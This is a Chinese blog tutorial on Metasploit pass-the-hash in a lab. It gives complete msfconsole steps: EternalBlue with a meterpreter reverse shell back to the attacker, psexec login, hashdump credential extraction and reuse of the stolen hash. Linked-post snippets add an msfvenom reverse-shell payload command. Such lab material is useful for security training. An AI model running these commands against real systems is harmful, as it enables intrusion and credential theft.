Metasploit之Hash值传递渗透

最新推荐文章于 2024-05-14 04:48:15 发布
最新推荐文章于 2024-05-14 04:48:15 发布
阅读量3k 收藏 6
点赞数 4
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29647709/article/details/84791407
版权

讲述Metasploit获取到hash值的渗透测试。

测试环境

目标机:

Windows 7 Ultimate
192.168.1.9

攻击机:

Linux 4.6.0-kali1-amd64 
192.168.1.31

攻击机姿势(永恒之蓝):

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.1.9
set payload  windows/meterpreter/reverse_tcp 
set lhost 192.168.1.12
exploit
获得shell

Metasploit之Hash值传递渗透

进入metasploit环境下进行操作

use exploit/windows/smb/psexec    -->使用这个渗透攻击模块

show options                      -->查看配置选项

set RHOST 192.168.1.9         -->设置攻击目标192.168.1.9  ,端口默认445

set SMBUser tdcoming               -->设置账号为 tdcoming

exploit                           -->执行攻击


成功后获得meterpreter的反弹连接

hashdump              -->获取hash值

使用hash值登陆

exit                  -->从meterpreter的反弹连接中返回到“msf exploit(psexec)>”

set smbpass hash值    -->设置hash值

exploit               -->再次登陆一遍
tdcoming
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Kali上的Metasploit获取ssh登录到靶机权限
WEL测试
03-30 7193
前置条件 靶机:metasploitable2 靶机IP:192.168.88.137 初始密码是:msfadmin/msfadmin kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用Metasploit获取mysql登录密码 进入Metasploit的控制台执行命令: msfconsole ...
Metasploit渗透测试(获取靶机控制权)
qq_51926773的博客
11-07 510
一,打开kali生成一个被控端: 输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe 这是你会发现你的kali会多出一个文件: 二,然后在kali输入msfconsole: 然后输入set payload windows/meterpreter/reverse_tcp,回车zai 再输入set lhost 靶机ip ...
哈希传递常用方法_hash传递工具(1)
最新发布
2401_84972799的博客
05-14 687
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
Metasploitable靶机渗透
qq_51926773的博客
11-01 2943
1.导入命令ifconfig得到自己的本机ip(即攻击机) 2.在kali打开nmap,输入自己的本机ip范围,得到在同一局域网的内存活的主机。 3.找到21端口,图片显示ftp。 4.接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip 5.然后使用浏览器来浏览http服务的信息,在网址栏输入目标靶机ip 6.得到网页,网页给出信息,登录靶机的账号密码 7.然后输入telnet ip 登录靶机 8.之后再调出控制栏输入msfconsole,连接靶机.
通过metasploit工具渗透Metasploitable 2靶机
热门推荐
朝歌
04-24 1万+
    首先,是Metasploitable 2的在本地的安装,    下载地址:https://sourceforge.net/projects/metasploitable/?source=typ_redirect。下载过后解压。会有四个文件。            用VM打开.vmsd文件。如果遇见需要配置文件什么的,就用VM打开vmx文件。        就会显示下面:打开虚拟机账号密码都...
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
保持微笑的博客
01-14 4788
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法) 干货干货干货
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
metasploit中使用lnk漏洞渗透测试.doc
03-18
Metasploit 中使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
渗透测试之Metasploit
06-16
本套教程,我们将为大家详细讲解Metasploit的使用方法。 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全...
Metasploit使用hash直接登录系统
ytfhjhv的博客
01-24 354
Metasploit使用hash直接登录系统
渗透测试环境搭建与metasploit工具使用
m0_64338210的博客
01-13 510
-Metasploit配置使用2 实验目的 熟悉ms17-010漏洞的原理及利用方法,掌握Metasploit的配置使用方法。 实验环境 操作机:Kali2018-TS (1)操作系统:Kali Linux 2018.4 (2)登录账号密码:操作系统帐号root,密码Sangfor!7890 靶机 pt-env (1)操作系统:Windows (2)安装的应用软件:PHPStudy 2013、DVWA漏洞网站环境 (3)登录账号密码:操作系统帐号Administrator,密码Sangf
网安实训(九)| 利用Metasploit工具和Ms17-010漏洞进行控制权限获取
朔方鸟的博客
02-19 3532
MS17-010是微软的一个系统漏洞,通过该漏洞,攻击者可获取到靶机的最高shell权限,从而进行一系列的操作。 本实验将利用Metasploit进行MS17-010漏洞的复现和攻击。
内网横传之哈希传递(Pass The Hash
11-25 7237
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
横向渗透之哈希传递(PTH)
qq_46258964的博客
05-08 1949
哈希传递PTH PTH,即Pass The Hash,通过找到与账号相关的密码散列值(通常是NTLM Hash)来进行攻击。 在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码。 因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。 kb2871997,禁止了本地管理员进行远程连接,从而组织了管理员权限执行wmi,psexec等危险命令, 但是这个补丁不知道为什么漏了一个默认(user SID=500)本
内网渗透哈希传递攻击
zzlx123的博客
12-18 1874
条件:获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着,可利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和NTLM-hash),这个利用跟工作组环境或者域环境无关。 这个网站提供对密码转换成 LM-Hash 和 NTLM...
进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器
weixin_43263566的博客
01-06 6570
Kali最强渗透工具- metasploit
Metasploit学习笔记(六)——Meterpreter后渗透Hash攻击提权(包含Mimikatz)
Zichel77的博客
10-09 2448
针对WIN7,还是用永恒之蓝。
Metasploit针对win10相关渗透模块
04-22
Metasploit是一款流行的渗透测试框架,也可以用于渗透测试和漏洞利用。针对Win10的渗透模块包括许多模块,例如ms16-014的模块。使用这些模块时需要注意以下几点: 1.首先,必须保证Metasploit框架本身是最新的版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值